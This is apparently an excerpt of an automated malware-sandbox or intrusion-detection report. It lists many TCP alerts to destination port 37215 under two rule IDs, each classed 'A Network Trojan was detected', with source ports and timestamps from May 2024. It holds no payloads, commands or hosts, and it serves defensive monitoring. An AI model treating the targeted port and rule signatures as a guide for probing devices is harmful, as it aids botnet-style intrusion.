            SID:2835222
            Source Port:49366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541899
            SID:2835222
            Source Port:34586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769055
            SID:2835222
            Source Port:45030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988660
            SID:2835222
            Source Port:36342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.804415
            SID:2829579
            Source Port:56052
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034907
            SID:2835222
            Source Port:50756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793867
            SID:2829579
            Source Port:53814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808510
            SID:2829579
            Source Port:38540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995296
            SID:2835222
            Source Port:60164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.834105
            SID:2829579
            Source Port:44402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.508085
            SID:2829579
            Source Port:35856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395835
            SID:2835222
            Source Port:33986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.110224
            SID:2835222
            Source Port:55036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.879800
            SID:2829579
            Source Port:38554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728318
            SID:2829579
            Source Port:50960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952978
            SID:2835222
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.912589
            SID:2835222
            Source Port:60660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.808419
            SID:2835222
            Source Port:56966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596994
            SID:2829579
            Source Port:53220
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645094
            SID:2835222
            Source Port:54762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852008
            SID:2835222
            Source Port:44768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.729017
            SID:2835222
            Source Port:44938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.892097
            SID:2835222
            Source Port:53590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715027
            SID:2829579
            Source Port:43292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777095
            SID:2829579
            Source Port:33728
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047832
            SID:2829579
            Source Port:36764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303711
            SID:2835222
            Source Port:46558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967617
            SID:2835222
            Source Port:59392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939309
            SID:2829579
            Source Port:57924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.966878
            SID:2835222
            Source Port:60618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.768280
            SID:2829579
            Source Port:40640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862769
            SID:2829579
            Source Port:43080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.279920
            SID:2835222
            Source Port:40300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.916762
            SID:2829579
            Source Port:34212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507665
            SID:2829579
            Source Port:58008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.034783
            SID:2835222
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825337
            SID:2835222
            Source Port:50558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843314
            SID:2835222
            Source Port:48132
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714444
            SID:2835222
            Source Port:35396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870193
            SID:2829579
            Source Port:52022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707512
            SID:2829579
            Source Port:36276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.002302
            SID:2829579
            Source Port:38256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880240
            SID:2835222
            Source Port:59642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.910251
            SID:2829579
            Source Port:56650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.920088
            SID:2829579
            Source Port:54320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.745987
            SID:2835222
            Source Port:59394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.764815
            SID:2829579
            Source Port:41828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.380180
            SID:2835222
            Source Port:35596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.771798
            SID:2835222
            Source Port:59208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446785
            SID:2835222
            Source Port:57876
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714065
            SID:2835222
            Source Port:36138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326617
            SID:2829579
            Source Port:49916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.398482
            SID:2829579
            Source Port:52166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.296016
            SID:2829579
            Source Port:40392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.707710
            SID:2835222
            Source Port:51312
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.927265
            SID:2829579
            Source Port:47358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811189
            SID:2835222
            Source Port:46380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020605
            SID:2829579
            Source Port:60214
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.868335
            SID:2835222
            Source Port:35046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998623
            SID:2835222
            Source Port:45480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988707
            SID:2835222
            Source Port:57272
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934013
            SID:2835222
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818382
            SID:2835222
            Source Port:37286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995572
            SID:2829579
            Source Port:48426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848926
            SID:2835222
            Source Port:41528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808628
            SID:2835222
            Source Port:57604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951325
            SID:2835222
            Source Port:59808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887203
            SID:2835222
            Source Port:54466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.377139
            SID:2835222
            Source Port:54294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948712
            SID:2835222
            Source Port:57604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777568
            SID:2829579
            Source Port:39614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.059199
            SID:2829579
            Source Port:48908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899840
            SID:2829579
            Source Port:41496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999785
            SID:2835222
            Source Port:35292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.302172
            SID:2835222
            Source Port:41198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.066560
            SID:2829579
            Source Port:59910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027058
            SID:2829579
            Source Port:41016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045306
            SID:2829579
            Source Port:41194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.072597
            SID:2829579
            Source Port:59062
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066024
            SID:2835222
            Source Port:39060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.760341
            SID:2835222
            Source Port:48792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.578816
            SID:2835222
            Source Port:34330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827356
            SID:2829579
            Source Port:51276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.704404
            SID:2835222
            Source Port:56322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058472
            SID:2829579
            Source Port:37576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730867
            SID:2835222
            Source Port:41252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:51.677428
            SID:2829579
            Source Port:55192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.955948
            SID:2835222
            Source Port:34946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773761
            SID:2829579
            Source Port:36152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.581541
            SID:2829579
            Source Port:34328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773957
            SID:2835222
            Source Port:45670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722281
            SID:2835222
            Source Port:51788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715323
            SID:2835222
            Source Port:35372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.944222
            SID:2835222
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066788
            SID:2835222
            Source Port:57768
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661660
            SID:2835222
            Source Port:54870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.745580
            SID:2835222
            Source Port:47592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.352260
            SID:2835222
            Source Port:43688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740435
            SID:2835222
            Source Port:55172
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.579061
            SID:2835222
            Source Port:43946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.290718
            SID:2829579
            Source Port:48248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871427
            SID:2829579
            Source Port:54558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.341202
            SID:2835222
            Source Port:43672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115893
            SID:2835222
            Source Port:33208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550512
            SID:2829579
            Source Port:43248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543413
            SID:2829579
            Source Port:55460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.995376
            SID:2829579
            Source Port:54674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861168
            SID:2829579
            Source Port:60902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.446917
            SID:2829579
            Source Port:60206
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261249
            SID:2829579
            Source Port:58196
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.853979
            SID:2835222
            Source Port:55092
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756860
            SID:2835222
            Source Port:33812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.822104
            SID:2835222
            Source Port:51682
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873246
            SID:2835222
            Source Port:39116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.050607
            SID:2829579
            Source Port:36200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067321
            SID:2829579
            Source Port:58246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913897
            SID:2829579
            Source Port:46608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.328230
            SID:2835222
            Source Port:56276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.805451
            SID:2829579
            Source Port:59922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.957574
            SID:2829579
            Source Port:58386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.392755
            SID:2829579
            Source Port:45618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559109
            SID:2829579
            Source Port:42360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605198
            SID:2829579
            Source Port:60444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280238
            SID:2835222
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.944333
            SID:2829579
            Source Port:44058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909530
            SID:2835222
            Source Port:59128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808248
            SID:2835222
            Source Port:48462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039817
            SID:2829579
            Source Port:51966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.019874
            SID:2829579
            Source Port:34404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697202
            SID:2829579
            Source Port:44710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.846524
            SID:2835222
            Source Port:42556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997982
            SID:2829579
            Source Port:54828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.686001
            SID:2835222
            Source Port:58322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620604
            SID:2835222
            Source Port:40806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.147575
            SID:2829579
            Source Port:58182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717616
            SID:2835222
            Source Port:56210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860699
            SID:2835222
            Source Port:47148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893115
            SID:2829579
            Source Port:51212
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.769730
            SID:2829579
            Source Port:59934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.434457
            SID:2835222
            Source Port:55940
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931240
            SID:2829579
            Source Port:58598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.658225
            SID:2829579
            Source Port:51158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.926620
            SID:2829579
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.706343
            SID:2835222
            Source Port:37308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.943229
            SID:2835222
            Source Port:46646
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.953417
            SID:2829579
            Source Port:51674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.532726
            SID:2829579
            Source Port:53218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470635
            SID:2835222
            Source Port:38526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.942402
            SID:2835222
            Source Port:47180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.940711
            SID:2829579
            Source Port:44486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.615361
            SID:2835222
            Source Port:58222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706541
            SID:2829579
            Source Port:46210
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675888
            SID:2829579
            Source Port:40746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.506890
            SID:2829579
            Source Port:33492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.856295
            SID:2835222
            Source Port:39992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.347036
            SID:2835222
            Source Port:41240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:35.433329
            SID:2829579
            Source Port:36534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767257
            SID:2835222
            Source Port:39484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.539857
            SID:2835222
            Source Port:40900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482902
            SID:2829579
            Source Port:40002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075040
            SID:2829579
            Source Port:36270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.749398
            SID:2829579
            Source Port:42996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.920251
            SID:2835222
            Source Port:49438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309583
            SID:2829579
            Source Port:45632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524429
            SID:2829579
            Source Port:51456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.532278
            SID:2829579
            Source Port:42604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675593
            SID:2829579
            Source Port:60624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395958
            SID:2829579
            Source Port:40558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.788909
            SID:2835222
            Source Port:39216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932876
            SID:2835222
            Source Port:36670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.291929
            SID:2835222
            Source Port:50398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.033450
            SID:2829579
            Source Port:37890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.863159
            SID:2835222
            Source Port:55926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895894
            SID:2829579
            Source Port:40042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.612157
            SID:2835222
            Source Port:60628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759788
            SID:2835222
            Source Port:42064
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989986
            SID:2835222
            Source Port:53834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.847308
            SID:2829579
            Source Port:45922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934145
            SID:2835222
            Source Port:33416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.815514
            SID:2829579
            Source Port:39542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777648
            SID:2829579
            Source Port:55186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804122
            SID:2829579
            Source Port:38978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.759974
            SID:2829579
            Source Port:48506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809418
            SID:2835222
            Source Port:37726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860990
            SID:2835222
            Source Port:48908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533790
            SID:2835222
            Source Port:40142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066755
            SID:2829579
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.698289
            SID:2829579
            Source Port:49586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303643
            SID:2829579
            Source Port:49154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849372
            SID:2829579
            Source Port:51772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893430
            SID:2835222
            Source Port:36226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.563981
            SID:2829579
            Source Port:34808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.158391
            SID:2829579
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899621
            SID:2829579
            Source Port:34864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.222038
            SID:2835222
            Source Port:49270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805109
            SID:2835222
            Source Port:46750
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716396
            SID:2835222
            Source Port:50126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.774158
            SID:2829579
            Source Port:59226
            Destination Port:37215
